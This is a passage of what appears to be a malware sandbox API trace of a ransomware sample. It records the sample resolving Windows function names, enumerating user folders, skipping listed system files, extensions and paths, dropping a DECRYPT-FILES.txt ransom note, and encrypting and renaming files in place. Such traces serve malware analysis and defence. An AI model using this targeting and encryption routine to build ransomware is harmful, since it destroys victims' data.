[0079.954] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.954] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.954] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.954] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.954] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.954] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.954] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.954] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.954] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.954] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.954] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.954] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.955] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.955] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.955] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.955] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.955] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.955] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.955] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.955] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.955] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.955] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.955] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.955] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.955] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.955] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.955] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.955] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.955] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.955] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.956] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.956] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.956] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.956] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.956] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.956] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.956] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat") returned 82 [0079.956] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat.d19Plni") returned 90 [0079.956] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat.d19Plni" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat.d19plni"), dwFlags=0x0) returned 1 [0079.957] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.957] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.958] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.958] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabd0abc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabd0abc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabd0abc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0079.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0079.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0079.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0079.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0079.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0079.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0079.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0079.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0079.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0079.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0079.958] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.958] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0079.958] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0079.958] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0079.958] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0079.958] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 73 [0079.958] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.958] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" [0079.958] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\jkbimi8.tmp" [0079.959] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0079.959] CloseHandle (hObject=0x0) returned 0 [0079.959] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.959] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x50fa8bb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x50fa8bb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0079.959] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0079.959] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0079.959] lstrcatW (in: lpString1="Low", lpString2="\\" | out: lpString1="Low\\") returned="Low\\" [0079.959] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" [0079.959] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Program Files") returned 0x0 [0079.959] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch=":\\Windows") returned 0x0 [0079.959] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Games\\") returned 0x0 [0079.959] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Tor Browser\\") returned 0x0 [0079.959] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\ProgramData\\") returned 0x0 [0079.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0079.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0079.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0079.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\All Users") returned 0x0 [0079.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\IETldCache\\") returned 0x0 [0079.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Local Settings\\") returned 0x0 [0079.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\AppData\\Local") returned 0x0 [0079.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="AhnLab") returned 0x0 [0079.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0079.960] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 77 [0079.960] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.960] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\jkbimi8.tmp") returned 89 [0079.960] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0079.960] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 77 [0079.960] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0079.960] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\DECRYPT-FILES.txt") returned 95 [0079.960] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0079.961] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0079.966] CloseHandle (hObject=0x45c) returned 1 [0079.967] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 77 [0079.967] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*" [0079.967] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabda3140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabda3140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0079.967] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.967] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabda3140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabda3140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0079.967] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.967] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.967] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabda3140, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabda3140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabdc92a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0079.967] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0079.967] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x50fa8bb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x50fa8bb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbaf619f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0079.967] lstrcmpiW (lpString1="index.dat", lpString2="DECRYPT-FILES.txt") returned 1 [0079.967] lstrcmpiW (lpString1="index.dat", lpString2="autorun.inf") returned 1 [0079.967] lstrcmpiW (lpString1="index.dat", lpString2="boot.ini") returned 1 [0079.967] lstrcmpiW (lpString1="index.dat", lpString2="desktop.ini") returned 1 [0079.967] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0079.967] lstrcmpiW (lpString1="index.dat", lpString2="iconcache.db") returned 1 [0079.967] lstrcmpiW (lpString1="index.dat", lpString2="bootsect.bak") returned 1 [0079.967] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat.log") returned -1 [0079.967] lstrcmpiW (lpString1="index.dat", lpString2="thumbs.db") returned -1 [0079.967] lstrcmpiW (lpString1="index.dat", lpString2="Bootfont.bin") returned 1 [0079.967] lstrlenW (lpString="index.dat") returned 9 [0079.967] lstrcmpiW (lpString1="dat", lpString2="lnk") returned -1 [0079.968] lstrcmpiW (lpString1="dat", lpString2="exe") returned -1 [0079.968] lstrcmpiW (lpString1="dat", lpString2="sys") returned -1 [0079.968] lstrcmpiW (lpString1="dat", lpString2="dll") returned -1 [0079.968] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 77 [0079.968] lstrlenW (lpString="index.dat") returned 9 [0079.968] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" [0079.968] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpString2="index.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat" [0079.968] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.968] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=114688) returned 1 [0079.968] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.968] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0079.970] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.970] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.970] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.973] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.973] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0079.976] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.976] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0079.977] CloseHandle (hObject=0x464) returned 1 [0079.977] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.977] WriteFile (in: hFile=0x460, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.978] CloseHandle (hObject=0x0) returned 0 [0079.978] CloseHandle (hObject=0x460) returned 1 [0079.980] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.980] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.981] GetTickCount () returned 0x114c7c2 